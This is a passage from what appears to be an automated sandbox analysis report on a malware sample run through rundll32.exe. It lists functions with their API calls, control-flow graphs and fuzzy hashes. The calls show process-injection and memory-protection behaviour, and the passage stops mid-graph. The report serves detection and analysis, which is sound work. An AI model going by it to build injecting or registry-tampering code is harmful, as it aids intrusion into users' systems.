                                                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000020), ref: 000D654B
                                                          • RtlAllocateHeap.NTDLL ref: 000D656D
                                                          • RegQueryValueExA.KERNELBASE ref: 000D65CF
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryValue$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2311914766-0
                                                          • Opcode ID: 1f6ad6994c92080283db70fc4a04c579610f830166e95bdc93f203490e1fbcbe
                                                          • Instruction ID: e297869ff75b202c3116391e5184a7eefedfeb2d8a8ab40020335d307808bb7d
                                                          • Opcode Fuzzy Hash: 1f6ad6994c92080283db70fc4a04c579610f830166e95bdc93f203490e1fbcbe
                                                          • Instruction Fuzzy Hash: 7A31A430608B088FDB58EF18E489666B3E0FB98301F11452EE84AC7255DF30E850CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000DF980, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 486 df980-df9fd 487 df9ff-dfa1f 486->487 488 dfa24-dfa50 486->488 493 dfc56-dfc6d 487->493 489 dfa66-dfa6a 488->489 490 dfa52-dfa64 488->490 492 dfa6e-dfa7a 489->492 490->492 494 dfa7c-dfa8b 492->494 495 dfa98-dfa9b 492->495 507 dfc2c-dfc36 494->507 508 dfa91-dfa92 494->508 496 dfb6f-dfb77 495->496 497 dfaa1-dfaa4 495->497 500 dfb79-dfb86 496->500 501 dfb88-dfb8b 496->501 498 dfab8-dfac9 LoadLibraryA 497->498 499 dfaa6-dfab6 497->499 503 dfacb-dfadf 498->503 504 dfb23-dfb2d 498->504 499->498 499->504 500->501 505 dfc28-dfc29 501->505 506 dfb91-dfb94 501->506 523 dfae1-dfaf1 503->523 524 dfaf3-dfb1e 503->524 509 dfb5f-dfb60 504->509 510 dfb2f-dfb33 504->510 505->507 515 dfbbf-dfbd3 506->515 516 dfb96-dfb99 506->516 511 dfc38-dfc4d 507->511 512 dfc53-dfc54 507->512 508->495 517 dfb68-dfb69 509->517 510->517 518 dfb35-dfb46 510->518 511->512 512->493 515->505 527 dfbd5-dfbe9 515->527 516->515 520 dfb9b-dfba6 516->520 517->496 518->517 529 dfb48-dfb5d 518->529 520->515 521 dfba8-dfbad 520->521 521->515 525 dfbaf-dfbb4 521->525 523->504 523->524 524->493 525->515 528 dfbb6-dfbbd 525->528 533 dfbf8-dfbfb 527->533 534 dfbeb-dfbf6 527->534 528->505 528->515 529->517 533->505 535 dfbfd-dfc24 533->535 534->533 535->505
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: H
                                                          • API String ID: 1029625771-2852464175
                                                          • Opcode ID: c49a4acf7bc8f46f379732404cbf2cd9fd691122b626915b3cf3683113567aa9
                                                          • Instruction ID: 1a26a6da63b194482bc0f8758b001804439b80bf91e328005afb5f15a0ff4313
                                                          • Opcode Fuzzy Hash: c49a4acf7bc8f46f379732404cbf2cd9fd691122b626915b3cf3683113567aa9
                                                          • Instruction Fuzzy Hash: 62A18C30518F0A8FE764DF68D89867677E1FBA8315F04862FD84AC7261EB34D941CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000B6A94, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 222stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 625 b6a94-b6ae7 627 b6c88 625->627 628 b6aed-b6af0 625->628 629 b6c8d-b6ca3 627->629 630 b6af2-b6af8 628->630 631 b6afa-b6afd 630->631 632 b6b49-b6b4b 630->632 635 b6aff-b6b02 631->635 636 b6b2d-b6b2f 631->636 633 b6b4d-b6b52 632->633 634 b6b55-b6b58 632->634 633->634 639 b6c6f 634->639 640 b6b5e-b6b80 634->640 635->636 641 b6b04-b6b06 635->641 637 b6b3b-b6b3c 636->637 638 b6b31-b6b39 636->638 643 b6b3f-b6b47 637->643 638->637 642 b6c74-b6c86 639->642 651 b6c68-b6c6d 640->651 652 b6b86-b6b93 640->652 644 b6b28-b6b2b 641->644 645 b6b08-b6b0b 641->645 642->629 643->630 643->632 644->643 645->634 646 b6b0d-b6b18 645->646 648 b6b1a 646->648 649 b6b1d-b6b25 646->649 648->649 649->644 651->642 653 b6c5b-b6c66 652->653 654 b6b99-b6b9f 652->654 653->642 655 b6ba1-b6bf5 654->655 658 b6c2f-b6c50 655->658 659 b6bf7-b6bf8 655->659 658->655 666 b6c56-b6c57 658->666 660 b6bfa-b6c09 lstrcmp 659->660 661 b6c0b-b6c23 660->661 662 b6c27 660->662 661->660 664 b6c25 661->664 665 b6c2a-b6c2b 662->665 664->665 665->658 666->653
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcmp
                                                          • String ID:
                                                          • API String ID: 1534048567-3916222277
                                                          • Opcode ID: 1b8dc8031022306e9345a288fd45bae1e1a689bceeb25608fd9f1601aeb3c630
                                                          • Instruction ID: bf784b9c5933b19e678f3ceed3ac5cafd11fc2b8559786939cd15497032ad71a
                                                          • Opcode Fuzzy Hash: 1b8dc8031022306e9345a288fd45bae1e1a689bceeb25608fd9f1601aeb3c630
                                                          • Instruction Fuzzy Hash: B9512971618A084BD738AF1C9C965B977D1F799310F64413ED8DAC3361EA2A9C4287C3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000CA524, Relevance: 3.2, APIs: 2, Instructions: 202memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 667 ca524-ca56c call ca140 670 ca6f2-ca6f7 667->670 671 ca572-ca58b call d8d98 667->671 672 ca6fb-ca71b 670->672 676 ca6e8-ca6f0 671->676 677 ca591-ca5c2 call b7380 671->677 676->672 677->672 681 ca5c8-ca5d0 677->681 682 ca648-ca677 VirtualProtect 681->682 683 ca5d2-ca5d7 681->683 685 ca679-ca681 call c35c0 682->685 686 ca686-ca6de call ce860 682->686 683->682 684 ca5d9-ca5eb call de348 683->684 684->682 691 ca5ed-ca605 call d8d98 684->691 685->686 686->672 698 ca6e0-ca6e6 686->698 691->682 697 ca607-ca642 VirtualProtect 691->697 697->682 698->672
                                                          APIs
                                                            • Part of subcall function 000D8D98: VirtualProtect.KERNELBASE ref: 000D8DCB
                                                          • VirtualProtect.KERNELBASE ref: 000CA642
                                                          • VirtualProtect.KERNELBASE ref: 000CA665
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: e79ce0048b4222cfd954818e7e7d674908e08b84fbf51762638f79b308669b1e
                                                          • Instruction ID: c942fd5ce327160f70230a1f91903c739f6e1147f3f0edeee3a27d261f8d078f
                                                          • Opcode Fuzzy Hash: e79ce0048b4222cfd954818e7e7d674908e08b84fbf51762638f79b308669b1e
                                                          • Instruction Fuzzy Hash: 5D516E70618B098FDB44EF29D889B69B7E0FB9C305F14456EE44EC3261DB34E985CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000BA4DC, Relevance: 3.1, APIs: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrRChrA.KERNELBASE ref: 000BA53A
                                                          • RtlAddVectoredContinueHandler.NTDLL ref: 000BA62E
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ContinueHandlerVectored
                                                          • String ID:
                                                          • API String ID: 3758255415-0
                                                          • Opcode ID: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                          • Instruction ID: 6f74b5a1509af468208c2b65b39fd42fc6dddc05afc88c1945e68826e55ce011
                                                          • Opcode Fuzzy Hash: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                          • Instruction Fuzzy Hash: B241E970708B0A8FEB65EF38985867A77F1EB99355B24413ED446C3261DF78C546CB02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000D541C, Relevance: 3.1, APIs: 2, Instructions: 114registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,00018F78,000D3022), ref: 000D5480
                                                          • RegCloseKey.KERNELBASE ref: 000D5503
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID:
                                                          • API String ID: 47109696-0
                                                          • Opcode ID: fddb71cb6013c17b65e6c5c58e4190fdbcf9f51217116a578ff1d9070016e93f
                                                          • Instruction ID: d3de95c0aec7f5a9498394d64cb08f6b4e853b50b36ac8553ef25f2428e66140
                                                          • Opcode Fuzzy Hash: fddb71cb6013c17b65e6c5c58e4190fdbcf9f51217116a578ff1d9070016e93f
                                                          • Instruction Fuzzy Hash: 24312E30618F0C4FDB94EF68E894A6677E1F7A8311B414A6EA44EC3365DB34D945C782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000D353C, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 51d92207df379dc83875e3aa58fb36a40af9c9bbd6bc0580ad4ef2799a51313c
                                                          • Instruction ID: 2a58b9db34c3addfee1fcc011c0a86754ec2895d6622b059e6e641f006594cac
                                                          • Opcode Fuzzy Hash: 51d92207df379dc83875e3aa58fb36a40af9c9bbd6bc0580ad4ef2799a51313c
                                                          • Instruction Fuzzy Hash: D1215E70618F088FE798EF68E889665B7E1FB98311F10446EE44AC3361EB35DD41CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000C374C, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(?,?,?,000DDCD3), ref: 000C376F
                                                          • RegOpenKeyA.ADVAPI32(?,?,?,000DDCD3), ref: 000C377C
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateOpen
                                                          • String ID:
                                                          • API String ID: 436179556-0
                                                          • Opcode ID: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                          • Instruction ID: 2e0b48ce006ac2c89e525595b8c16835bdef460275d46608edfea21f6cf07e0e
                                                          • Opcode Fuzzy Hash: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                          • Instruction Fuzzy Hash: B201847061CB098FDB54EB5C9488B2ABBE5EBAD345F14452EE88DC3360DA74C9458743
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000B1CC4, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateQueueThreadUser
                                                          • String ID:
                                                          • API String ID: 3600083758-0
                                                          • Opcode ID: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                          • Instruction ID: 0ef238b189e443edbddc30693ca9d561d79e8a799760c18b3433a85c85d5175b
                                                          • Opcode Fuzzy Hash: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                          • Instruction Fuzzy Hash: 73014C30714A094FABA4EF6DA84D63977F2EB98351724457AE419C3270DF78DC428B86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000B7E0C, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: a106af5d0ced5a47d6bcdf0535ea1047a1c970f0eef90624918c376d659d4d5b
                                                          • Instruction ID: a3971692184a85b2b1c6e3c008a80740adff5ece49a56040fda66e79ab936b33
                                                          • Opcode Fuzzy Hash: a106af5d0ced5a47d6bcdf0535ea1047a1c970f0eef90624918c376d659d4d5b
                                                          • Instruction Fuzzy Hash: 3261503061CF099FD794EF18D889AA577E1FBAC301B50456EE84AC3661EB34EC41CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000C98FC, Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlDeleteBoundaryDescriptor.NTDLL ref: 000C9A42
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptor
                                                          • String ID:
                                                          • API String ID: 3203483114-0
                                                          • Opcode ID: 26bc7b7e104518ddba554de4156c252715addc58dba5be73b5a25652a6bd6292
                                                          • Instruction ID: c20bec89693025086d0acd2e49af39f989bc54d7c63cebb22219d706cd03150c
                                                          • Opcode Fuzzy Hash: 26bc7b7e104518ddba554de4156c252715addc58dba5be73b5a25652a6bd6292
                                                          • Instruction Fuzzy Hash: 0841A630618E5C8FDB58EF6CD889AA973E1F759310B51412EE44AC3262DA78DC86C7C2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000C4E4C, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 6de2a5f7a581128cc52d6808a1fb70f5bdda2aa886d81256fa9f1a0c77678a23
                                                          • Instruction ID: e39ab25e1d18938092dbf67834df9e4e94fefa798820dd342eb86c0d70bfd3c5
                                                          • Opcode Fuzzy Hash: 6de2a5f7a581128cc52d6808a1fb70f5bdda2aa886d81256fa9f1a0c77678a23
                                                          • Instruction Fuzzy Hash: 4331217061CB484FDBA4EF1C9885B65B7E1FB99311F11466EE84DC3262DB70EC418B86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000D0C54, Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SleepEx.KERNEL32(?,?,?,?,?,?,0000007E,000DC00F), ref: 000D0D31
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 207ec0fc07338e3f1373991df744463c1f1d3d026ca20c19ccf35147a8500794
                                                          • Instruction ID: 6cf624d6033da1fb443d710c2f7263c97712eeeecc435553ddd84d4664ed7c23
                                                          • Opcode Fuzzy Hash: 207ec0fc07338e3f1373991df744463c1f1d3d026ca20c19ccf35147a8500794
                                                          • Instruction Fuzzy Hash: 723150303187048BEB58EF69D8D5AAA73E3EB98300704C53EA44BC7361DF78D9469751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000C199C, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlDeleteBoundaryDescriptor.NTDLL ref: 000C1A3E
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptor
                                                          • String ID:
                                                          • API String ID: 3203483114-0
                                                          • Opcode ID: 9ea574213d0b9dd17366d7da8b7244112765cf04dfd161500232577f378886c1
                                                          • Instruction ID: 3cdf2efb2aca8c1e369238253287ef2527aa0e3044d5a9968dbee55fee32b86b
                                                          • Opcode Fuzzy Hash: 9ea574213d0b9dd17366d7da8b7244112765cf04dfd161500232577f378886c1
                                                          • Instruction Fuzzy Hash: 5721923460CA0D4FDB98EF69A8457B9B7E1F799301B60842EE55FC3262DE24DC478782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000DE4A4, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 000C374C: RegCreateKeyA.ADVAPI32(?,?,?,000DDCD3), ref: 000C376F
                                                          • RegQueryValueExA.KERNELBASE ref: 000DE508
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateQueryValue
                                                          • String ID:
                                                          • API String ID: 2711935003-0
                                                          • Opcode ID: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
                                                          • Instruction ID: 142c608fdeedde880f437008d501d5ca93846e4d3f52753a027c6bd409ec5280
                                                          • Opcode Fuzzy Hash: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
                                                          • Instruction Fuzzy Hash: EA21F17061CB4C8FE794EF68D448B5AB7E1FB98345F40092EA48AC7355EB74D940CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000D8D98, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 3f038f664194ed09418985c20b287aca218c62dbb155e60d2d7415b02c667552
                                                          • Instruction ID: f453810d0332d6f2fde66f7976c108ffbc2f61a27061924746adbf2bb8e2e056
                                                          • Opcode Fuzzy Hash: 3f038f664194ed09418985c20b287aca218c62dbb155e60d2d7415b02c667552
                                                          • Instruction Fuzzy Hash: 6711933160CB098F9B48EF58E849525B7E5FB98311B00863EE98BC3345EF70ED458B96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000DD2F4, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 000C1950: NtWriteVirtualMemory.NTDLL ref: 000C196F
                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000DD348
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtual$MemoryProtectWrite
                                                          • String ID:
                                                          • API String ID: 1789425917-0
                                                          • Opcode ID: 6b5c0d0765a110b65d8f4f092558aae6303376241adeb56fa8819492f7b7c9bb
                                                          • Instruction ID: 1a1ec2f6300bc82a252407742e25c67fbab0e80344953d77f28c0ad71a4b0448
                                                          • Opcode Fuzzy Hash: 6b5c0d0765a110b65d8f4f092558aae6303376241adeb56fa8819492f7b7c9bb
                                                          • Instruction Fuzzy Hash: 4C017C70618B088FCB48EF58A0C5529B7E0EB9C310B4405AEE84DC7346CB70DD44CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000BA9A0, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE ref: 000BA9F1
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 5e627e4eeb0547a02e045b33c94f03be2364a689ea05fb59daad38687b791655
                                                          • Instruction ID: f93252896060e5002f1cee1f3b0eaa508024af1ccf56b7e2ff3fa22b7acafcb3
                                                          • Opcode Fuzzy Hash: 5e627e4eeb0547a02e045b33c94f03be2364a689ea05fb59daad38687b791655
                                                          • Instruction Fuzzy Hash: 7FF06231318B454FEF98DF69D498A6AB3E1FFD8301F44162DB546C3250DB78C8454742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Analysis Process: rundll32.exe PID: 4612 Parent PID: 2896 rundll32.exeCOMMON

                                                          Executed Functions

                                                          Function 00000195D8AD20A4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationQueryToken$Close
                                                          • String ID: 0
                                                          • API String ID: 459398573-4108050209
                                                          • Opcode ID: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                          • Instruction ID: 10a1c618c346285ccefee265ab951e2206f890788753a96cecb68cc18b5a6196
                                                          • Opcode Fuzzy Hash: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                          • Instruction Fuzzy Hash: 88413930208B898FE764EF58D894BAAB7E6FB98311F50493DE58EC3254DB349945CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8ADB948, Relevance: 4.0, APIs: 2, Instructions: 1012synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 46 195d8adb948-195d8adb9c3 49 195d8adb9f9 46->49 50 195d8adb9c5-195d8adb9f7 call 195d8ac10cc 46->50 52 195d8adb9fe-195d8adba01 49->52 50->52 54 195d8adc491-195d8adc4ad 52->54 55 195d8adba07-195d8adba30 CreateMutexExA 52->55 58 195d8adba32-195d8adba37 55->58 59 195d8adba4e-195d8adba51 55->59 62 195d8adba39-195d8adba46 58->62 63 195d8adba4b-195d8adba4c 58->63 60 195d8adc48e-195d8adc48f 59->60 61 195d8adba57-195d8adba7e 59->61 60->54 66 195d8adba84-195d8adbad0 61->66 67 195d8adbb47 61->67 62->60 63->59 79 195d8adbad2-195d8adbad9 66->79 80 195d8adbae7-195d8adbafb 66->80 68 195d8adbb4c-195d8adbb4f 67->68 68->54 70 195d8adbb55-195d8adbb96 68->70 73 195d8adbb9c-195d8adbba2 70->73 74 195d8adbca7 70->74 76 195d8adbba4-195d8adbbb2 73->76 77 195d8adbc10-195d8adbc35 73->77 78 195d8adbcac-195d8adbcaf 74->78 81 195d8adbbb4-195d8adbbfc 76->81 91 195d8adbc9d-195d8adbca5 77->91 92 195d8adbc37-195d8adbc55 77->92 78->54 82 195d8adbcb5-195d8adbcd0 GetUserNameA 78->82 79->80 85 195d8adbadb-195d8adbae1 call 195d8abb404 79->85 84 195d8adbb01-195d8adbb2b 80->84 86 195d8adbbfe-195d8adbc02 81->86 87 195d8adbc08-195d8adbc0e 81->87 88 195d8adbcd2-195d8adbcee 82->88 89 195d8adbd01-195d8adbd13 82->89 103 195d8adbb2d-195d8adbb45 84->103 85->80 86->87 87->77 87->81 88->89 99 195d8adbcf0-195d8adbcf9 88->99 93 195d8adbd1c-195d8adbd65 89->93 94 195d8adbd15-195d8adbd1a 89->94 91->78 106 195d8adbc57-195d8adbc69 92->106 114 195d8adbd78-195d8adbd79 93->114 115 195d8adbd67-195d8adbd70 93->115 94->93 98 195d8adbd87-195d8adbd8c 94->98 100 195d8adbdce-195d8adbdd1 98->100 101 195d8adbd8e-195d8adbdaf 98->101 99->89 107 195d8adbdd3-195d8adbde3 call 195d8addb0a 100->107 108 195d8adbde8-195d8adbe1f 100->108 120 195d8adbdb1-195d8adbdb8 101->120 121 195d8adbdc3-195d8adbdcb 101->121 103->68 106->106 110 195d8adbc6b-195d8adbc9b 106->110 107->108 116 195d8adbe21-195d8adbe41 108->116 117 195d8adbe83 108->117 110->78 119 195d8adbd81 114->119 127 195d8adbea6-195d8adbeb2 115->127 128 195d8adbd76 115->128 131 195d8adbe47-195d8adbe65 call 195d8ab83bc 116->131 122 195d8adbe88-195d8adbe8b 117->122 119->98 120->121 125 195d8adbdba-195d8adbdc1 120->125 121->100 122->54 126 195d8adbe91-195d8adbe94 122->126 125->100 132 195d8adbe9d-195d8adbea0 126->132 133 195d8adbe96 call 195d8ac98fc 126->133 129 195d8adbeb4-195d8adbee5 call 195d8abdccc 127->129 130 195d8adbf2c-195d8adbf3e call 195d8ac3de4 127->130 128->119 129->130 142 195d8adbee7-195d8adbeef 129->142 145 195d8adbf40-195d8adbf71 call 195d8abdccc 130->145 146 195d8adbf78-195d8adbf8a call 195d8ac1164 130->146 143 195d8adbe75 131->143 144 195d8adbe67-195d8adbe71 131->144 132->54 132->127 138 195d8adbe9b 133->138 138->132 142->130 149 195d8adbef1-195d8adbf26 call 195d8ad9700 142->149 151 195d8adbe7a-195d8adbe81 143->151 144->131 150 195d8adbe73 144->150 154 195d8adbf92-195d8adbf97 call 195d8ac2a8c call 195d8ade4a4 145->154 155 195d8adbf73-195d8adbf74 145->155 146->154 149->130 150->151 151->122 162 195d8adbf9c-195d8adbfde call 195d8ab415c 154->162 155->146 165 195d8adbfe0-195d8adbfff 162->165 166 195d8adc007-195d8adc014 call 195d8ac341c 162->166 165->166 166->54 170 195d8adc01a-195d8adc033 166->170 170->54 172 195d8adc039-195d8adc061 170->172 174 195d8adc063-195d8adc078 172->174 175 195d8adc087-195d8adc0b1 call 195d8ab1cc4 172->175 174->175 181 195d8adc07a-195d8adc082 174->181 179 195d8adc0b3-195d8adc0bb 175->179 180 195d8adc0c0-195d8adc0d0 175->180 179->54 182 195d8adc23e-195d8adc245 180->182 183 195d8adc0d6-195d8adc114 call 